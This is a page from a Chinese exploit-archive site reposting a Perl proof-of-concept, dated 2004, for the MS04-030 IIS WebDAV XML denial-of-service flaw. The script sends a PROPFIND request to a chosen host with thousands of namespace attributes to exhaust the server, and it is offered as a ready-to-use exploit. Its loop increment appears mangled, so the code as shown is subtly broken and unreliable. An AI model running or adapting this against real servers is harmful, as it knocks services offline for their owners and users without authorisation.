首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)


http://www.gipsky.com/
#!/usr/bin/perl

# IIS BlowOut

# POC exploit for MS04-030. Found by Amit Klein.

# incognito_ergo yahoo com

# usage: perl ms04-030_spl.pl host port



use IO::Socket;



$port = @ARGV[1];

$host = @ARGV[0];





$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort =>

$port,Proto => "TCP");





for ($count=1; $count<9999; $count ) #more than nuff

{



$xmlatt = $xmlatt. "xmlns:z" . $count . "=\"xml:\" ";



}







$xmldata = "<?xml version=\"1.0\"?>\r\n<a:propfind xmlns:a=\"DAV:\" " .

$xmlatt .

">\r\n<a:prop><a:getcontenttype/></a:prop>\r\n</a:propfind>\r\n\r\n";



$l=length($xmldata);



$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost:

$host\nContent-length: $l\n\n$xmldata\n\n";



syswrite($socket,$req,length($req));



close $socket;

[2004-10-20]
<< MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) BitchX 1.0c19 Local Root Exploit (suid?) >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8